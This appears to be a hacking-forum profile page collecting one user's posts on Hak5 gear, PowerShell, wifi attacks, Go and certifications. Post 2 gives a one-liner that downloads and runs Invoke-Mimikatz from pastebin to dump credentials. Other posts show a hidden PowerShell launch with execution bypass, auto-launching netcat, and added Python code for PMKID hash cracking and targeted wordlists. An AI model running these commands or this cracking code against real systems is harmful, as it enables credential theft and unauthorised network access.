PoSHMagiC0de
Dedicated Members
Posts: 618
Days Won: 26

Everything posted by PoSHMagiC0de

  1. We are going to need a VM to compile this and redistribute it onto the Bunny. You can get the compiling going by installing build-essential with aptitude, but the Bunny chokes on the compilation at different parts at different times. It cannot handle it. If you want to continue to try, then apt install build-essential while internet sharing and try the pip install -r requirements.txt again to see if it compiles. You will also need to pip install --upgrade setuptools to get rid of another error. I gave up when I saw it was compiling, as I know any compilation I did on the Bunny that pushed it usually locks up.
  2. Wait, you're launching PowerShell from within PowerShell? If you are, that is your issue. Depending on what you are trying to do, you will have to do it differently. If run from the command line, that will work. But if within PowerShell, then the below will need to be done. Start-Process "Powershell" -argumentlist "/C `"IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/FvASwLVQ');Invoke-Mimikatz -DumpCreds`"" But if you are already in PowerShell, I do not see the need for the above.
  3. Try changing the "-C" to a "/C". I noticed on Windows that sometimes the "-"s break stuff, like when using WMI to launch processes with command line arguments.
  4. You can, or you can SSH into it and work on the command line if you are l33t enough. It has an internal web interface on the Pineapple. It is not served from their site. I believe the dashboard does connect to their portal, but just to pull down news.
  5. Yeah..... I read through this thread twice and still got lost. If I read it correctly, the original question asked why Hak5 products are tied to their servers. Well, they are not. The Bash Bunny, Rubber Ducky, and all their stuff does not require you to speak back to their server. If you want new firmware and stuff, you can download it and install it, but usage does not require, nor does it, talk back to Hak5. The Cloud C2 might, and if it does, it will be for product registration, since that is one of their only products that has a free and paid tier, so it has licenses. So, I do not know of any Hak5 hardware that has a mandatory umbilical back to them. Support you get is all manual: manually calling/emailing them and manually downloading and installing updates. Hmm, I think the Pineapple speaks back to their server, but only to return whether there are updates, and I believe there is an option to turn that off.
  6. I parsed through the Go code real quick for Bettercap and see there is no output except to the console for GPS data. Not even a REST API for it, else I would suggest building a service in whatever language you want that can hit the REST API of bettercap to query that data on a time interval. For something like this, kismet might be a better choice. Set up kismet as a sensor on your remote devices that can communicate to a kismet instance that is the server. Though, I wouldn't shoot that openly across the inet. Maybe create VPN or SSH tunnels back to the server and serve it through there? Have the kismet listener listening on localhost only for the SSH tunnel, or on the private VPN network for the VPN tunnel. You get it.
  7. This is a PowerShell module I have been using for a while now. Figured I would share it here. The git readme is thorough enough to explain how it works. One cool feature it has: if you are planning to run your finished script as a command from the command prompt, it warns if you are over the character limit. https://github.com/danielbohannon/Invoke-Obfuscation
  8. Lol. That was a hilarious blunder. I don't have a rooted phone for this device. 😑
  9. Hmm, wonder if encryption software people who have no way of decrypting customer data can just not offer their products to Australia to avoid breaking their software? I would.
  10. You can also get a VPS like DigitalOcean (Bithost is the same thing but with bitcoin) and use the roadwarrior script to set up a quick SSL VPN of your own before heading out, and then use that with OpenVPN to hide your traffic.
  11. One thing I have done with crunch, as an experiment in targeted wordlist generation, is to take a sample wordlist of a target. From that, get a list of all unique characters in the list (to prevent repetition we do not need and that will not make sense). I then choose a minimum word size and a max word size I think the word or phrase will be. I make sure to include a space in the character list so phrases can be generated. From that you can generate smaller wordlists with crunch, using only characters from words you think make up their password.
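The procedure in the post above, written out as an added example (not code from the post): derive the unique character set from a sample of the target's known words, keep the space so phrases come out, and either emit the equivalent crunch command line or enumerate the candidates directly for small keyspaces. The sample words, the output filename and the length bounds are constructed for illustration.

```python
"""Targeted wordlist generation from a sample of a target's words.

Added example, not from the original post. Uses only the standard library.
SAMPLE_WORDS below is a constructed sample; a real run would read it from a
file of words gathered about the target.
"""
import itertools
import shlex
from typing import Iterable, Iterator, List, Optional

SAMPLE_WORDS = ["blue dog", "Dog2010", "bluedog!"]  # constructed sample


def charset_from_words(words: Iterable[str], include_space: bool = True) -> str:
    """Return the sorted set of unique characters across the sample words.

    Deduplicating is the whole point: every character that never appears in
    the sample is dropped from the keyspace, and the space is kept so that
    multi-word phrases can be generated.
    """
    chars = set("".join(words))
    if include_space:
        chars.add(" ")
    return "".join(sorted(chars))


def keyspace_size(min_len: int, max_len: int, charset: str) -> int:
    """Number of candidates crunch would emit for these bounds and charset."""
    n = len(charset)
    return sum(n ** length for length in range(min_len, max_len + 1))


def crunch_command(min_len: int, max_len: int, charset: str,
                   outfile: str = "targeted.txt") -> List[str]:
    """argv for the equivalent crunch run: crunch <min> <max> <charset> -o <file>.

    The charset is a single positional argument, so when it contains a space
    it must be quoted on a real shell line; shlex.join takes care of that.
    """
    return ["crunch", str(min_len), str(max_len), charset, "-o", outfile]


def crunch_shell_line(min_len: int, max_len: int, charset: str,
                      outfile: str = "targeted.txt") -> str:
    """Shell-quoted form of crunch_command, safe to paste into a terminal."""
    return shlex.join(crunch_command(min_len, max_len, charset, outfile))


def generate(min_len: int, max_len: int, charset: str,
             limit: Optional[int] = None) -> Iterator[str]:
    """Pure-Python equivalent of the crunch run, for small keyspaces.

    Emits every string of length min_len..max_len over charset, in the same
    shortest-first, lexicographic-within-length order crunch uses.
    """
    emitted = 0
    for length in range(min_len, max_len + 1):
        for tup in itertools.product(charset, repeat=length):
            yield "".join(tup)
            emitted += 1
            if limit is not None and emitted >= limit:
                return


if __name__ == "__main__":
    cs = charset_from_words(SAMPLE_WORDS)
    print("charset:", repr(cs))
    print("candidates for 8..10 chars:", keyspace_size(8, 10, cs))
    print(crunch_shell_line(8, 10, cs))
```

Before running the crunch line, check keyspace_size; restricting the alphabet helps a lot, but a ten-character phrase over even fifteen symbols is still hundreds of billions of candidates, so the length bounds matter as much as the charset.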
  12. Hey, anyone tried out Go yet? Watched an 8 hour YouTube video on it (not all at once, of course) and have been messing with it for almost a month. I like it. I like C but hate the tediousness of it sometimes if you want to do something simple. I like dynamic languages like Python that make it easy to do a lot of things without thinking too hard, but hate that it doesn't have strict typing when I want it at runtime unless I implement my own methods of ensuring it. Go gives me both, and the simple concept of concurrency in it is a plus, because we all love trying to handle sharing data among threads. 🙂 Who else has given this language a "Go"? See what I did there? 😛
  13. Try this: powershell -NoP -NonI -W Hidden -Exec Bypass -C "$u=(gwmi win32_volume -Filter {Label='PD'}).Name;cd $u;.\d.cmd;" You passed the name already. No need to reference it in the variable. Surprised it even works in your stand-alone tests, unless you are already in the folder with the d.cmd file. Also, to remove the extra (") that might be terminating the string, you can use "{}" for the filter statement in PowerShell.
  14. Okay, my bad. I posted the wrong link. Empire team has not updated their version yet. The version that works is still in the pull request and does work for Win10.
  15. hcxdumptool doesn't quit when it has the PMKID, plus there is one more tool needed to convert what hcxdumptool gets into a hashcat-crackable formatted hash. I looked into automating these, but it's not so simple. I have been messing with scapy with 802.11, and it may be possible to automate this in Python. You will need to set up a channel-hopping beacon capture part to get access points. You will need to set up a thread after that to handle association with scapy and monitor it once APs are found. You will need a thread to begin authentication but not finish. The PMKID is usually sent when the AP sends its ANonce. You will just need to figure out how to create the 16800 hash that hashcat can understand to pass it to hashcat. I have been busy with a talk for a DevFest that happened here, but am free now and might look into this. It may be possible, though, depending on whether you can get association and all that working. You could try aireplay-ng for the association, but it doesn't return anything to let you know if it is associated (no error codes or anything). If the AP is MAC filtering, then this can be an issue.
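The last step the post describes, turning a captured PMKID into the line hashcat mode 16800 expects, as an added example that is not code from the post or from hcxdumptool. Grabbing the PMKID out of the first EAPOL frame is left to the capture tool; this only reproduces the WPA2 math (PMK by PBKDF2-HMAC-SHA1, PMKID by HMAC-SHA1-128 over "PMK Name" || AP MAC || STA MAC) so you can build the hash line from the fields and check a candidate passphrase against it offline, which is exactly what hashcat does per guess. The SSID, MACs and passphrase are constructed; newer hashcat releases fold 16800 into mode 22000, whose line format differs, so check your version.

```python
"""PMKID -> hashcat 16800 line, plus an offline candidate check.

Added example, not from the original post or any tool it names.
Standard library only. All demo values (DEMO_*) are constructed.
Line format for mode 16800: <PMKID>*<AP MAC>*<STA MAC>*<SSID as hex>,
MACs as 12 lowercase hex digits with no separators.
"""
import hashlib
import hmac
from typing import Iterable, Optional, Tuple


def mac_bytes(mac: str) -> bytes:
    """'00:11:22:33:44:55' or '00-11-...' -> 6 raw bytes."""
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal PMK: PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA): first 16 bytes of the tag."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def hashcat_16800_line(pmkid_value: bytes, ap_mac: str, sta_mac: str, ssid: str) -> str:
    """Assemble the four '*'-separated fields hashcat mode 16800 reads."""
    return "*".join([
        pmkid_value.hex(),
        mac_bytes(ap_mac).hex(),
        mac_bytes(sta_mac).hex(),
        ssid.encode().hex(),
    ])


def parse_16800_line(line: str) -> Tuple[bytes, bytes, bytes, str]:
    """Inverse of hashcat_16800_line; raises ValueError on a malformed line."""
    parts = line.strip().split("*")
    if len(parts) != 4:
        raise ValueError("expected 4 '*'-separated fields, got %d" % len(parts))
    pmkid_hex, ap_hex, sta_hex, ssid_hex = parts
    if len(pmkid_hex) != 32 or len(ap_hex) != 12 or len(sta_hex) != 12:
        raise ValueError("bad field length in 16800 line")
    return (bytes.fromhex(pmkid_hex), bytes.fromhex(ap_hex),
            bytes.fromhex(sta_hex), bytes.fromhex(ssid_hex).decode())


def check_candidate(line: str, candidate: str) -> bool:
    """Recompute the PMKID from a guessed passphrase and compare to the captured one."""
    want, ap, sta, ssid = parse_16800_line(line)
    got = pmkid(pmk_from_passphrase(candidate, ssid), ap, sta)
    return hmac.compare_digest(want, got)


def crack(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Linear pass over a wordlist; returns the first matching passphrase or None."""
    for word in wordlist:
        if check_candidate(line, word):
            return word
    return None


# Constructed demo network: in real use these come from the capture.
DEMO_SSID = "HomeNet"
DEMO_AP = "00:11:22:33:44:55"
DEMO_STA = "66:77:88:99:aa:bb"
DEMO_PASSPHRASE = "correct horse"


def demo_line() -> str:
    """Build the 16800 line a capture of the demo network would yield."""
    value = pmkid(pmk_from_passphrase(DEMO_PASSPHRASE, DEMO_SSID),
                  mac_bytes(DEMO_AP), mac_bytes(DEMO_STA))
    return hashcat_16800_line(value, DEMO_AP, DEMO_STA, DEMO_SSID)


if __name__ == "__main__":
    line = demo_line()
    print(line)
    print("recovered:", crack(line, ["password", "letmein", DEMO_PASSPHRASE]))
```

The 4096-round PBKDF2 per guess is why this is slow in pure Python and why you hand the line to hashcat; the script is for building and sanity-checking the input, not for cracking at scale. Because the PMKID is an HMAC over the two MAC addresses, a line with the wrong AP or station MAC will never match even with the right passphrase, so verify those fields against the capture first.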
  16. Yep, MS released an update that prevents part of the payloads from running, the part that injects mimikatz into memory. See my new post on the thread.
  17. Looks like we are going to have to start rolling our own crypto or use older, "non-backdoored" versions. Governments always want to look at people's nudie pics and porno behind their backs. Tell them to go find their own porno. Perverted gov agents.
  18. I am leaning in the direction of @barry99705. I was the type to push everyone toward college back in the day, but now I have been more picky as to when you need to spend half your life on a student loan if you do not have to. School versus payoff these days has gotten tough when it comes to loans, so I always try to steer people away from them if they can attain the knowledge just as well by other means, but that is just my background when it comes to education these days. Though I still believe in obtaining knowledge. Now, with that. My job put me through the CeHv9 course. I have practice exams, and from people who paid to take the test for the cert and from the practice exams, I lost interest in a CeH cert. Nothing to do with the difficulty of the test. Doesn't seem hard. It was just the content of the tests and those wacky throw-ins (which are in the practice too) that made it feel like the industry tried to standardize hacking. It was watered down and made me feel someone with no real world experience can get one of these and be mistaken for a security expert, like an MCSE. If you want a cert, aim for the OSCP if you have to spend money on a qualification. From what I've seen of it, it shows real world knowledge and you can even learn from it if you fail, versus a CeH, where failing means you have to go memorize more stuff. I am not knocking those who already have the CeH cert. Even I was going down that path to have a piece of paper to satisfy some industry goons. Ultimately, I am settling on getting OSCP types of certs, as they have shown that to attain them you have to show some sort of real world competence in the field. I say "hack" together your own learning and education path.
  19. http://overthewire.org is another one with wargames on it.
  20. Tried it, it works. Better if you use the parameters --filtermode=2 --filterlist=<text file with BSSIDs you are targeting>. Else it goes after every beacon it hears. You also have to manually break when you see the status say pownd=1, as it means it has gotten a PMKID. Have to check if there is a param to quit after 1 PMKID is captured, for automation.
  21. Maybe a yagi and a wifi amp? I built myself a couple of cantennas from stainless steel toilet brush holders and mounted them to tripods. Good range directionally. I am waiting for a 3000mW 35 dB amp to come in this week to see if I can make it go even further. For extreme ranges you will need a directional antenna, which seems to work well, and maybe an amp if you want to get more. Heck, on Amazon you can get some huge wifi amps and a parabolic dish if you are that serious.
  22. Hmm, could the command be added to the interfaces file after auto-upping the interface? Might be able to create a service that starts after the interface is up. A background bash file called from local.rc that looks at the interface every 5 seconds and launches netcat when an IP shows?
  23. I waited to reply to this. I am an old fud. There is nothing wrong with using the tools others before you have provided. The thing that makes me really call someone a script kiddie is when their learning and understanding stops there. So, you have this tool and its source, or an exploit and its source, but you never bothered to look into how it works or what makes it tick. You never reverse engineered it to see what is going on, hence you really do not know what it is doing. That is like giving a 5 year old a nuke. They know it goes boom, but they do not know anything about fallout and radiation. So, being a temporary kiddie on your way to understanding is cool. Being a kiddie because you are mentally lazy is not hacking. It doesn't even define the word, because you are only an expert at running someone else's tool. In my opinion you become one of the masses on GitHub asking a creator to figure out and add a certain exploit instead of knowing anything themselves about how the exploit works, much less adding it themselves. That is a script kiddie through and through. So, if you use Metasploit to pop a test box, look at how that exploit works. Try to rewrite it in another language like Python or whatever. Metasploit even comes with tools built into itself to inspect its payloads' source. Want to learn how to exploit with PowerShell? Look at Empire and its modules. Use the tool and then look under the hood to see how it is pulled off, so you know and can do this in any situation with almost any custom code. In the process you may come up with cool ideas yourself. Those two tools have taught me so much about how a C&C server would work. A magician pulling a magic trick when the magician doing it has no idea how they did it is sad. Funny when someone in the audience does know and can do it even better because they do.
  24. Also, if I read correctly, you are planning on having a public-facing exploitable machine with a VPN tunnel to your internal network? Hmm, I would not do that. You can accomplish a lab like this all internally without facing anything to the public, with VMs and a pfSense VM. Pretty much all you are going to be practicing is exploiting a firewalled machine with some services port-forwarded that your attacker can see, with a VPN to some machine or machines in another subnet firewalled except for VPN.
  25. Or, it could be MS is buying GitHub so they can all of a sudden change the terms of service and then jack everyone's code on the site to make a profit off of using it in their projects, and make up some BS for the original creator to not get credit. That sounds more like Microsoft. It follows their history of stealing, starting with Bill himself.